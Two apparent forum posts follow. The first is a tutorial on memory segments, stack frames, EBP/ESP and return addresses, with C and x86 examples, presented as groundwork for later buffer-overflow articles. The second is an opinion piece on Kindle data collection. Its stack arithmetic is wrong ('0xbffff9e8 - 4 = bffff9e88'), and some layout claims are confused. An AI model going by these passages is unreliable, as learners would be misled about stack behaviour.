  13. In this article I will talk about memory segmentation. I will define fairly clearly how memory is divided into segments when an executable is created. Since there are several types of memory, to clarify things: main memory refers to RAM. In this tutorial I talked about memory, Physical && Virtual Memory Explained, and here I will talk about how RAM is divided into segments. After this tutorial you will be able to understand the concepts of stack and heap. I will explain only the essentials, and what is more complicated you will understand along the way only if you program in C or Assembly. Another tutorial that may help you understand what is described here is Basic GAS AT&T Assembly Syntax [Tutorial]. If you are fed up with hearing about PUSH, POP, ESP, EBP, EIP, STACK, HEAP, BUFFER, then drop it, because this tutorial is not for you.

I will start with the following definition: RAM is divided into segments, which we can call memory sections. When and where can this be observed? When an executable is written, the data from the source code together with the instructions are saved in memory. Each piece of data in the executable is saved in a particular memory section. What is the use of knowing this? The answer is simple: it lets you have control over the executable and the system. How? You will notice and realize it only if you continue to study this principle. I will present the sections into which memory can be divided, and when I give an example with a piece of code I will explain where each instruction is placed.
    RAM
    -------------
    -   stack   - <- dynamic memory segment
    -------------
    -           -
    -           -
    -   NULL    - <- unallocated memory segment
    -           -
    -           -
    -------------
    -   heap    - <- dynamic memory segment
    -------------
    -   BSS     - <- variables that are not initialized
    -------------
    -   data    - <- initialized variables
    -------------
    -   text    - <- the executable's instructions
    -------------
    -           -
    -    OS     - <- space allocated for the operating system
    -           -
    -------------

The memory sections or zones contain certain addresses. What is important to know is that addresses are numbered from the highest value, decrementing toward 0, and the OS segment reaches the first memory available in RAM. One more important aspect: when data is placed in the stack segment, it starts allocating space from the NULL segment, and when data is extracted it frees the NULL segment. The same thing happens with the heap segment: when data is stored, it occupies space in NULL. (Note: I called this segment NULL, but it actually has no generic name; it is just a memory space that is not used.) When an executable is written, the variables, functions and instructions defined are stored in these segments. Here we will do a few examples. The following example shows in which segment certain variables will be stored:

    #include <stdio.h>
    #include <stdlib.h>

    void function(void)
    {
        int first = 0; // stack
        printf("Introdu un caracter: ");
        scanf("%d", &first);
        printf("[+] int %d (va merge in segmentul stack la adresa addr %p)\x0a", first, (void *)&first);
        return;
    }

    int main(void)
    {
        static int second;    // goes in the BSS segment
        static int third = 2; // goes in the data segment
        //int *fourth;        // the following variable is allocated in the stack segment but is a pointer into the heap segment
        int *fourth = (int *)malloc(sizeof(int)); // heap
        int *fifth;           // a pointer that goes in the stack segment
        printf("[+] int second addr %p (va merge in segmentul bss)\x0a", (void *)&second);
        printf("[+] int third addr %p (va merge in segmentul data)\x0a", (void *)&third);
        printf("[+] int fourth addr %p (va merge in segmentul heap)\x0a", (void *)fourth);
        printf("[+] int fifth addr %p (va merge in segmentul stack)\x0a", (void *)&fifth);
        function();
        free(fourth);         // release the heap block before exiting
        return 0;
    }

You only have to compile and run the code; in the output you will be able to see at which address each variable is located and in which segment it is stored. As you can see, the program's instructions will be stored in the text segment.

We will continue with 2 important memory segments, namely Stack and Heap:

    -------------
    -   stack   - <- dynamic memory segment
    -------------
    -           -
    -           -
    -   NULL    - <- unallocated memory segment
    -           -
    -           -
    -------------
    -   heap    - <- dynamic memory segment
    -------------

To recap: whenever data is stored in the stack, it will move downward, taking the space needed to store that data from the NULL segment; the same effect occurs if the data is stored in the heap segment. Your question is probably the following: what happens if both segments take the available space from NULL? Well, the stack segment is dynamic, and once the data has been processed it frees the space from NULL. The heap segment does the same, except that here it depends on the programmer, because memory in this segment is allocated with the malloc() function and freed with the free() function. Obviously, if someone allocates a lot of memory in the heap segment without freeing it, we will have a memory leak. The stack segment differs from the heap, and once it no longer needs the data it frees the memory dynamically and automatically.
How does the stack segment work? Various variables are allocated dynamically in the stack. For example, if we store the values 1, 2, 3 in the stack, freeing or extracting the values is done in reverse order: the first value we extract from the stack is 3, then 2 and 1. This concept is called LIFO (Last In First Out). A small demonstration. We have the following code:

    int main()
    {
        int var1; // declare a variable var1
        int var2; // declare a variable var2
        int var3; // declare a variable var3
    }

This data is allocated in the stack segment exactly in the order in which it was declared, namely:

    STACK
    ---------- <- EBP
    -  var1  -
    ----------
    -  var2  -
    ----------
    -  var3  -
    ---------- <- ESP

The stack segment will grow downward, occupying space from the NULL segment. Here I will introduce 2 new aspects: in assembly two registers are used. The register that contains the last memory address of the stack is called ESP (Extended Stack Pointer); another register, which contains the first memory record of the function or procedure we are in, is called EBP (Extended Base Pointer). For now there is only one function, namely main.

As I mentioned, addresses are numbered from top to bottom, in reverse; we will never have a stack that starts from 0, because there will always be other processes in the system already using those addresses. So let us suppose that at the moment we want to put a value on the stack, ESP is at address 0xbffff9e8; to store 4 bytes on the stack, a decrement of 4 bytes must be made.
So 0xbffff9e8 - 4 = bffff9e88. Now ESP will be at address 0xbffff9e8. Each time a value is pushed, a decrement is made. Now, when I perform the following mathematical operation, namely bffff9e88 + 4 = 0xbffff9e8, I delete 4 bytes from the stack and the ESP register will now be at address 0xbffff9e8. Given that it starts from a higher address and decrements toward 0, when an addition is made elements are removed, and when elements are put in a decrement is made and the stack address grows downward toward 0. Assembly provides two instructions for storing and extracting data from the stack: PUSH and POP. PUSH stores a value in the stack segment and POP extracts a value. There is one more very important aspect of this memory segment, which I will try to explain with the following code example:

    #include <stdio.h>

    /* prints a message; returns nothing */
    void doprint(void)
    {
        printf("Hello\n");
    }

    int main()
    {
        doprint();
        return 0;
    }

We have a simple executable that calls a function that does a print. We will analyze the data in the stack at the moment the doprint function is called. So when the print function is called, this is what happens.

MAIN calls doprint:

    0x080483de <main+6>: call 0x80483c4 <doprint>
    0x080483e3 <main+11>: mov $0x0,%eax

At this moment, the next address to be executed after doprint finishes its work is stored on the stack as the return address. When doprint finishes, it returns here and main continues.

The value of the EBP register is pushed on the stack:

    0x080483c4 <doprint+0>: push %ebp

EBP value: 0xbffff9a8

The current value of ESP is put into EBP:

    0x080483c5 <doprint+1>: mov %esp,%ebp

On the stack a decrement of 24 bytes is made to allocate the space needed for variables:
    0x080483c7 <doprint+3>: sub $0x18,%esp

Note: 0x18 is equivalent to 24 in hex.

The data from the doprint function is loaded and printed:

    0x080483ca <doprint+6>: movl $0x80484b0,(%esp)
    0x080483d1 <doprint+13>: call 0x80482f8 <puts@plt>

The next instruction is important because here the doprint function has finished its work and must return to main to finish the program:

    0x080483d6 <doprint+18>: leave
    0x080483d7 <doprint+19>: ret

The leave instruction makes the ESP and EBP registers take back the values they had before entering doprint. The ret instruction copies the address 0x080483e3 into EIP, so the processor executes the instruction found at that address, namely return 0;

    Stack
    --------------
    - 0x080483e3 - <- Return Address
    --------------
    - EBP (OLD)  -
    -------------- <- EBP
    - 0xbffff980 -
    --------------
    - 0xbffff990 -
    -------------- <- ESP

In a debugger, the stack segment for these instructions can be represented like this:

    0xbffff980: 0xb7fc5304 0xb7fc4ff4 0x08048400 0xbffff9a8
    0xbffff990: 0xb7eb3365 0xb7ff1040 0xbffff9a8 0x080483e3

For now I end the tutorial here; I will continue with other articles where I will discuss buffer overflow. If you have questions, feel free to ask them. Many other things were not explained so as not to confuse the user. The purpose of this tutorial was to explain that memory can be divided into segments and that various data can be stored in these segments.
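The segment layout and the frame contents described in this tutorial can be checked from inside a running process. The following is an added example, not part of the original post; it assumes Linux with GCC or Clang (the linker symbols `etext`, `edata`, `end` and the frame-address builtins), and all function names in it are the example's own.

```c
#define _DEFAULT_SOURCE            /* exposes sbrk() under strict -std= modes */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Linker-defined symbols on Linux (see end(3)): first address past the
 * text segment, past the initialized data, and past .bss. */
extern char etext, edata, end;

enum segment { SEG_TEXT, SEG_DATA, SEG_BSS, SEG_HEAP, SEG_MMAP, SEG_STACK };
static const char *const seg_name[] = {
    "text", "data", "bss", "heap (brk)", "mmap area", "stack"
};

static int uninit_static;          /* no initializer  -> .bss  */
static int init_static = 2;        /* has initializer -> .data */

/* Classify an address by walking the boundaries from the lowest segment
 * upward, the same order as the tutorial's diagram read bottom to top. */
__attribute__((noinline)) enum segment classify(const void *p)
{
    volatile char probe = 0;       /* lives in the newest stack frame */
    uintptr_t a = (uintptr_t)p;
    void *brk_now = sbrk(0);       /* current top of the brk-managed heap */

    if (a < (uintptr_t)&etext) return SEG_TEXT;
    if (a < (uintptr_t)&edata) return SEG_DATA;
    if (a < (uintptr_t)&end)   return SEG_BSS;
    if (brk_now != (void *)-1 && a < (uintptr_t)brk_now) return SEG_HEAP;
    /* The tutorial's unused gap: on Linux it also holds mmap()ed memory
     * (shared libraries, large malloc() blocks). */
    if (a < (uintptr_t)&probe) return SEG_MMAP;
    return SEG_STACK;              /* at or above the newest frame */
}

/* Address of a local variable `depth` nested calls below the caller.
 * marker is 0, so the sum is still the deepest call's address. */
__attribute__((noinline)) uintptr_t local_addr_at_depth(int depth)
{
    volatile char marker = 0;
    if (depth > 0)
        return local_addr_at_depth(depth - 1) + marker; /* not a tail call */
    return (uintptr_t)&marker;
}

/* 1 when deeper calls place their locals at lower addresses. */
int stack_grows_down(void)
{
    return local_addr_at_depth(4) < local_addr_at_depth(0);
}

/* What `push %ebp; mov %esp,%ebp` leaves at the frame pointer:
 * fp[0] = caller's saved frame pointer, fp[1] = return address.
 * This holds for GCC/Clang on x86, x86-64 and AArch64. */
struct frame_view { void *saved_fp, *ret_slot, *ret_builtin; };

__attribute__((noinline)) struct frame_view view_frame(void)
{
    void **fp = __builtin_frame_address(0);
    struct frame_view v = { fp[0], fp[1], __builtin_return_address(0) };
    return v;
}

static void show(const char *what, const void *p)
{
    printf("%-14s %p -> %s\n", what, (void *)(uintptr_t)p, seg_name[classify(p)]);
}

int main(void)
{
    int on_stack = 0;
    int *on_heap = malloc(sizeof *on_heap);
    struct frame_view v = view_frame();

    if (on_heap == NULL)
        return 1;
    show("function", (const void *)(uintptr_t)classify);
    show("init static", &init_static);
    show("uninit static", &uninit_static);
    show("malloc block", on_heap);
    show("local", &on_stack);
    show("return addr", v.ret_slot);
    printf("stack grows down: %d\n", stack_grows_down());
    printf("frame slot matches builtin: %d\n", v.ret_slot == v.ret_builtin);
    free(on_heap);
    return 0;
}
```

The return address read from the frame classifies as text because it points at the instruction after the call, which is the value `ret` loads into the instruction pointer.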
  14. Starting from 2012, I can state that the earth revolves not only around the Sun but also around an object that can be called "Social Network". I have always tried to keep a certain limit when it comes to personal identity and to expose as little data as possible on the internet. Google asked me for my phone number, Linkedin asked me for a CV and much other data, Blogspot a small photo, Ebay all personal data including a credit card. Out of necessity I had to satisfy each of them, but I still refused to publish personal data classified as confidential, and I managed to convince Ebay, for example, that the address where the product should be sent, the credit card and the paypal account do not necessarily have to be mine. I ignored Facebook and the rest of the social network portals because I considered they would be a big waste of time. If you have not created an account on a Social Network so far, do not waste your time creating one. I never created a personal Yahoo account and did not use their portal because, to be honest, I would have preferred Google more (only because I have always respected what Sergey Brin and Larry Page did, not for the commercial concept this portal has today). The only thing that still keeps me tied to Yahoo is the Yahoo Finance portal, for the various options it offers.
I started this article talking about various portals, but I will continue with Amazon. Finally, in 2012 I also created an Amazon account, because I found the Ebook reader they offer, namely the Kindle, interesting. Like the Iphone, there are various types of Kindle, and I decided to get something simple for reading books; the Kindle Touch (no ads) version was the most suitable, because the Kindle Fire is no longer an Ebook reader (my opinion) but a real Ipad. Be careful: prices vary, and you pay more if you want a (no ads) device. I opened the package, pressed the button, the display lit up, and the first thing that appeared was a Hello followed by my name. OK, so Amazon knows what my name is. The second time I accessed the portal, Amazon started making various suggestions of products I should buy next, namely: 1. It tells me I should buy a charger for the Kindle. 2. It tells me I should buy a cover. 3. It tells me I am also missing a screen protector for the Kindle. 4. It tells me I cannot read in the dark unless I also get a Reading Lights type device. This means Amazon makes decisions for me and knows what is best. Most people talk about freedom, while others decide how your pleasure should be satisfied, or rather give you an order; but it is not nice to say order, because most people believe they buy because they decided personally, without being forced, even though that is not so.
The Kindle has wireless, and probably everyone is happy about that because they can connect to the internet, but there is a logic to everything: once you load your books onto the device and connect to the internet, Amazon downloads metadata for each book you have on the Kindle, and after a short while, if you connect to their portal again, Amazon also knows what books you like to read, and if you do a Search only the products that interest you appear, because Amazon has done data mining and knows what you actually want. Every query made in the Kindle's browser is tracked by Amazon, and Amazon knows how many pages of a book you have read and which page you stopped at. (A legalized commercial keylogger.) Another important feature of this device is that it lets you select text from the books you read and add a NOTE, so you can always have a separate bookmark of some lines of a text that may interest you and that you would like to save in one place. Once you highlight a paragraph, it is saved in a single place called "My Clippings", and when you connect to the internet everything is synchronized with the Amazon portal. Once again Amazon sticks its nose in to see what interests you, and the next time you do a Search it will shove under your nose the first products that have some connection to what you like. Anyway, subconsciously you will believe that you actually want to buy this thing because you liked it very much, but once again someone else made the decision for you. To obtain more data, Amazon also released a Kindle 3G, where Amazon pays for your internet connection (Works Globally) only for the Amazon portal and Wikipedia (one more resource for Data Mining). Obviously you cannot change the name of a book on the Kindle unless you have an external Ebook management application such as Calibre, but the Kindle concept was created so that you connect to the internet and download metadata from the Amazon portal, so next to your name, which is already printed when you receive the device, your data will sit as well. Another aspect regarding Amazon: when you buy an item on their portal, Amazon prepares a form with a Facebook Share button for the item you bought, to remind you not to forget to show off to others with it, so that new customers will come. Once again we talk about freedom, but others play with our pleasures and decide what we should believe we actually need. Amazon created an Ebook format, namely AZW, and also offers an online service where you can convert various other formats such as PDF to AZW, because even though the Kindle supports PDF, do not think you will be able to read PDFs the way you expect: the text format must be structured for the 6" display so that the page layout suits the reader, otherwise you will see only the first vertical half of the page. Well, to convert a format to AZW the document must be sent directly to Amazon and you will receive it directly on the Kindle, so Amazon already created an email address for you when you bought this device, and it looks something like yourname[@]kindle.com (once again it forces you to connect the device to the internet to check the email, and at the same time you synchronize your data with them). So my wish to read books on an Ebook reader became a public matter that must be shared with Amazon, and the next 2 things bought on Amazon were chosen directly by them, because they were a necessity for what I bought initially, and I only pressed the Order button. What can I say about the structure of this device from a Hardware point of view?
Freescale 532 MHz, ARM-11, with a Linux kernel, and it uses E Ink (electrophoretic ink) technology, which is quite perfect for reading books; so instead of reading them in front of a computer or an Ipad, which are much more harmful to the eyes, it would be preferable to read them on a black-and-white Ebook reader. To keep your personal data in your own bag, do not connect this device to the internet, and try to use various other applications, such as Calibre, to modify the metadata of each ebook. The device reads formats like MOBI correctly, so convert PDF to MOBI for a better result. Beyond that I could add the following: a Kindle that is not connected to the internet is safer than a Kindle connected to the internet, but given that you are not free, you will be given orders in such a way that you yourselves take the decision to act as others please, believing that you are satisfying your own pleasures. Peace!